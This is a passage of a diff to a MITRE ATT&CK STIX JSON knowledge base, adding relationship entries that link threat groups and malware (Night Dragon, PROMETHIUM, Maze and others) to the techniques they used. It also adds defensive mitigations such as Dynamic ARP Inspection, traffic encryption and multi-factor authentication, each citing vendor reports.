"https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used privately developed and customized remote access tools.(Citation: McAfee Night Dragon)", + "relationship_type": "uses", + "id": "relationship--f82e6303-3524-42e1-8f43-fa1bb4303c7e", + "type": "relationship", + "modified": "2020-10-15T00:54:00.812Z", + "created": "2020-10-15T00:54:00.812Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed digital certificates for use in HTTPS C2 traffic.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--66e5238f-c1f7-4094-8c2e-e8e41a4c12f3", + "type": "relationship", + "modified": "2020-10-15T01:57:09.092Z", + "created": "2020-10-15T01:57:09.092Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--a624f944-5f3e-4713-9e89-9964ae82c677", + "type": "relationship", + "modified": "2020-10-15T02:00:30.447Z", + "created": "2020-10-15T02:00:30.447Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed certificates to sign malicious installers.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--4ac5b593-8f47-46cc-9af3-fcb0eb20f66e", + "type": "relationship", + "modified": "2020-10-22T18:13:16.606Z", + "created": "2020-10-15T02:02:39.748Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--1b7c7b5c-22df-4713-be96-818a8916e6d1", + "type": "relationship", + "modified": "2020-10-15T02:59:38.710Z", + "created": "2020-10-15T02:59:38.710Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Consider enabling DHCP Snooping and Dynamic ARP Inspection on switches to create mappings between IP addresses requested via DHCP and ARP tables and tie the values to a port on the switch that may block bogus traffic.(Citation: Cisco ARP Poisoning Mitigation 2016)(Citation: Juniper DAI 2020)", + "id": "relationship--cea07509-b84d-4b25-b9e8-758a8e66b3f1", + "external_references": [ + { + "source_name": "Cisco ARP Poisoning Mitigation 2016", + "url": "https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html", + "description": "King, J., Lauerman, K. (2016, January 22). ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique. Retrieved October 15, 2020." + }, + { + "source_name": "Juniper DAI 2020", + "url": "https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html", + "description": "Juniper. (2020, September 23). Understanding and Using Dynamic ARP Inspection (DAI). Retrieved October 15, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-16T15:22:46.508Z", + "created": "2020-10-15T12:05:58.901Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to MiTM HTTPS traffic. Certificate errors may arise when the application\u2019s certificate does not match the one expected by the host.", + "id": "relationship--59c65423-347b-4a09-a24d-c228faaa5119", + "type": "relationship", + "modified": "2020-10-16T15:19:48.483Z", + "created": "2020-10-15T12:05:58.908Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that can identify traffic patterns indicative of MiTM activity can be used to mitigate activity at the network level.", + "id": "relationship--55e36f24-f7dd-4966-b39f-88349b86fff3", + "type": "relationship", + "modified": "2020-10-16T15:19:48.527Z", + "created": "2020-10-15T12:05:58.903Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.", + "id": "relationship--07bc8502-7a60-4d19-b1e1-f4fb081ed50d", + "type": "relationship", + "modified": "2020-10-16T15:19:48.602Z", + "created": "2020-10-15T12:05:58.955Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Create static ARP entries for networked devices. Implementing static ARP entries may be infeasible for large networks.", + "id": "relationship--c44ff9d1-8718-49d7-9054-f7c89a221c93", + "type": "relationship", + "modified": "2020-10-16T15:19:48.619Z", + "created": "2020-10-15T12:05:58.958Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "relationship_type": "mitigates", + "description": "Consider disabling updating the ARP cache on gratuitous ARP replies.", + "id": "relationship--8fe9affe-bf8d-4392-882d-d3e737eb5c43", + "type": "relationship", + "modified": "2020-10-16T15:19:48.644Z", + "created": "2020-10-15T12:05:58.959Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "relationship_type": "subtechnique-of", + "id": "relationship--559d4b9f-55ed-4626-9be2-a64638d0bfc3", + "type": "relationship", + "modified": "2020-10-15T12:05:58.968Z", + "created": "2020-10-15T12:05:58.968Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "target_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has used custom tools to facilitate ARP cache poisoning.(Citation: Cylance Cleaver)", + "relationship_type": "uses", + "id": "relationship--1e03e6e0-8b7b-4e93-a955-245561085aae", + "type": "relationship", + "modified": "2020-10-15T16:59:26.907Z", + "created": "2020-10-15T13:56:46.934Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "relationship_type": "mitigates", + "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", + "id": "relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a", + "type": "relationship", + "modified": "2020-10-16T18:25:12.864Z", + "created": "2020-10-15T16:47:27.531Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6", + "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "relationship_type": "mitigates", + "description": "Prevent users from changing the HISTCONTROL, HISTFILE, and HISTFILESIZE environment variables. (Citation: Securing bash history)", + "id": "relationship--dbb28d6a-0007-467a-ae7a-bf09eddd436c", + "external_references": [ + { + "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "source_name": "Securing bash history" + } + ], + "type": "relationship", + "modified": "2020-10-16T18:25:12.918Z", + "created": "2020-10-15T16:47:27.551Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) used publicly available malware for privilege escalation.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--7b817a81-02a9-48f0-8166-9e25b6860a76", + "type": "relationship", + "modified": "2020-10-22T18:35:55.876Z", + "created": "2020-10-15T20:57:52.171Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--0783831d-da64-4bb3-a54e-c5149e7e0d76", + "type": "relationship", + "modified": "2020-10-15T23:51:41.311Z", + "created": "2020-10-15T23:51:41.311Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "relationship_type": "mitigates", + "description": "Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.", + "id": "relationship--0d891052-0c98-4d4a-8d1b-42a02f656eaf", + "type": "relationship", + "modified": "2020-10-16T15:14:23.785Z", + "created": "2020-10-16T12:22:53.928Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "relationship_type": "mitigates", + "description": "Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to MiTM HTTPS traffic. Certificate errors may arise when the application\u2019s certificate does not match the one expected by the host.", + "id": "relationship--7833393c-1a00-432b-beed-8225f754a5bd", + "type": "relationship", + "modified": "2020-10-16T15:14:23.801Z", + "created": "2020-10-16T13:39:46.822Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing attempts.", + "id": "relationship--3de6d2ba-842b-4f60-b177-d8082eebbb1e", + "type": "relationship", + "modified": "2020-10-25T19:44:02.543Z", + "created": "2020-10-19T04:14:47.401Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing attempts.", + "id": "relationship--756acf5d-6765-4611-b451-f855eefcbb77", + "type": "relationship", + "modified": "2020-10-25T19:44:58.227Z", + "created": "2020-10-19T04:15:36.481Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing attempts.", + "id": "relationship--a581fb2c-604a-4417-b782-cafd76b11c37", + "type": "relationship", + "modified": "2020-10-24T04:12:48.300Z", + "created": "2020-10-19T04:16:36.949Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", + "target_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing attempts.", + "id": "relationship--59f80c0d-e8d7-48f6-960a-3d4b593f8b33", + "type": "relationship", + "modified": "2020-10-24T04:13:12.880Z", + "created": "2020-10-19T04:17:45.388Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "relationship_type": "mitigates", + "description": "Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.", + "id": "relationship--ca433ac6-fb5a-41bc-969b-4721571fe836", + "type": "relationship", + "modified": "2020-10-22T02:24:54.830Z", + "created": "2020-10-19T13:40:11.224Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "relationship_type": "subtechnique-of", + "id": "relationship--fd44a14f-1ca5-4356-a6fe-c5507a77d490", + "type": "relationship", + "modified": "2020-10-19T13:40:11.238Z", + "created": "2020-10-19T13:40:11.238Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) operators have created scheduled tasks masquerading as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\" designed to launch the ransomware.(Citation: Sophos Maze VM September 2020) ", + "relationship_type": "uses", + "id": "relationship--20cedb41-1f7b-44df-8d49-5d6fc166c557", + "type": "relationship", + "modified": "2020-10-19T13:55:56.024Z", + "created": "2020-10-19T13:55:56.024Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)", + "relationship_type": "uses", + "id": "relationship--62c1a647-4a39-45b1-8d68-99b19ec12a78", + "type": "relationship", + "modified": "2020-10-19T16:33:42.242Z", + "created": "2020-10-19T13:55:56.273Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "mitigates", + "description": "Upon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised. Continue to monitor for additional activity and to ensure that the blocks are indeed effective.", + "id": "relationship--ac04879c-2316-4c3c-86e4-8fac1e80fb49", + "type": "relationship", + "modified": "2020-10-20T15:54:10.968Z", + "created": "2020-10-19T16:08:29.990Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--3541e998-a3ac-42d7-8a66-f66da6f9162a", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-20T15:54:10.994Z", + "created": "2020-10-19T16:08:30.018Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "mitigates", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "id": "relationship--37a08308-6dc4-4e20-bdb1-907b37cda04b", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "type": "relationship", + "modified": "2020-10-20T15:54:11.013Z", + "created": "2020-10-19T16:08:30.023Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--415fc129-cac9-4d8c-8285-8ea563489b03", + "type": "relationship", + "modified": "2020-10-20T15:54:11.017Z", + "created": "2020-10-19T16:08:30.026Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "mitigates", + "description": "Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats. Ensure that, where available, local passwords are always encrypted, per vendor recommendations.(Citation: Cisco IOS Software Integrity Assurance - AAA)", + "id": "relationship--e85b405b-bd20-4f66-aebc-3726768d46ed", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - AAA", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-21T01:42:22.164Z", + "created": "2020-10-19T16:08:30.029Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "relationship_type": "mitigates", + "description": "Block Traffic\tUpon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised. Continue to monitor for additional activity and to ensure that the blocks are indeed effective.", + "id": "relationship--f03e2a94-27c6-470f-9f87-7cac3c6845af", + "type": "relationship", + "modified": "2020-10-21T01:45:59.133Z", + "created": "2020-10-19T16:48:08.498Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--7b6a48c0-9bcc-47d2-976a-e7dbaa00f4bc", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-21T01:45:59.129Z", + "created": "2020-10-19T16:48:08.513Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "relationship_type": "mitigates", + "description": "Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats. Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - AAA)", + "id": "relationship--56499082-a21f-4d6d-9bdd-8ee6b2dfcad4", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - AAA", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-21T01:45:59.168Z", + "created": "2020-10-19T16:48:08.525Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "relationship_type": "mitigates", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "id": "relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "type": "relationship", + "modified": "2020-10-21T01:45:59.183Z", + "created": "2020-10-19T16:48:08.533Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": 